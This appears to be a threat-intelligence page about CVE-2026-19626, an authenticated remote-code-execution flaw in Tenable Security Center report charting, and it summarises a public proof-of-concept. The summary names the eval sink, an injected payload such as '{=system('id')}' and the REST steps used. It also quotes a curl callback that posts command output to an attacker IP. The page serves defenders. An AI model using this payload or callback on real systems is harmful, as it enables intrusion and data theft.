CVE-2026-19626 is an improper neutralization of directives in dynamically evaluated code vulnerability in Tenable Security Center for Linux versions earlier than 6.9.0. The flaw is present in report generation and charting-related server-side rendering. A low-privileged authenticated user can submit specially crafted report input that is processed unsafely during rendering, leading to arbitrary code execution in the Security Center service context.
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
What an attacker gets, and what they’ve been doing with it.
If you can’t patch tonight, do this now.
Patch, then assume compromise.
1 valid exploit after Mallory filtered fakes, detection scripts, and README-only repos (1 hidden).
Repository contains a README and a single Python exploit script, `poc.py`. It is a real exploit PoC for CVE-2026-19626 affecting Tenable Security Center report generation. The exploit is authenticated, remote, and specifically intended for non-admin users with report-definition capability. The core capability is RCE during report rendering. The documented primary sink is `ReportChartingLib::substituteParams()`, where `{=...}` expressions in pie-chart legend/label format strings are evaluated with PHP `eval()`. The exploit abuses label substitution order: an attacker creates a group whose name contains a payload such as `{=system('id')}`, then creates a report definition that causes the group name to be inserted into a chart label before the eval loop runs. Launching the report triggers server-side command execution. The README also documents two alternate sinks in the same PHP file: `labelStyling` eval and `barShape` callable abuse. `poc.py` is a purpose-built REST client. It authenticates to `/rest/token`, creates the payload-bearing group, creates a report definition via `/rest/reportDefinition`, launches it via `/rest/reportDefinition/{id}/launch`, and waits for command output. Although the README notes that command output can appear in the rendered report itself, the provided PoC uses a more reliable callback payload invoking `curl -d "$(<cmd>)" http://<attacker_ip>:<port>` so the target POSTs command output back to a temporary HTTP server started by the script. The script also cleans up the created group afterward. Repository structure is minimal and focused: README provides vulnerability analysis, exploitation rationale, patch notes, and lab observations; `poc.py` implements the exploit workflow. No framework affiliation is evident. Overall, this is an operational PoC demonstrating authenticated web/REST-based RCE against vulnerable Tenable SC instances.
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
9 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A remote code execution vulnerability in Tenable.sc report charting functionality, referenced via a Metasploit exploit module.
Referenced CVE in the Tenable SecurityCenter plugin entry; no specific details provided in the content.
A remote code execution vulnerability in Tenable Security Center's report generation functionality that allows an authenticated non-administrative user to achieve arbitrary code execution via specially crafted input during server-side report rendering.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.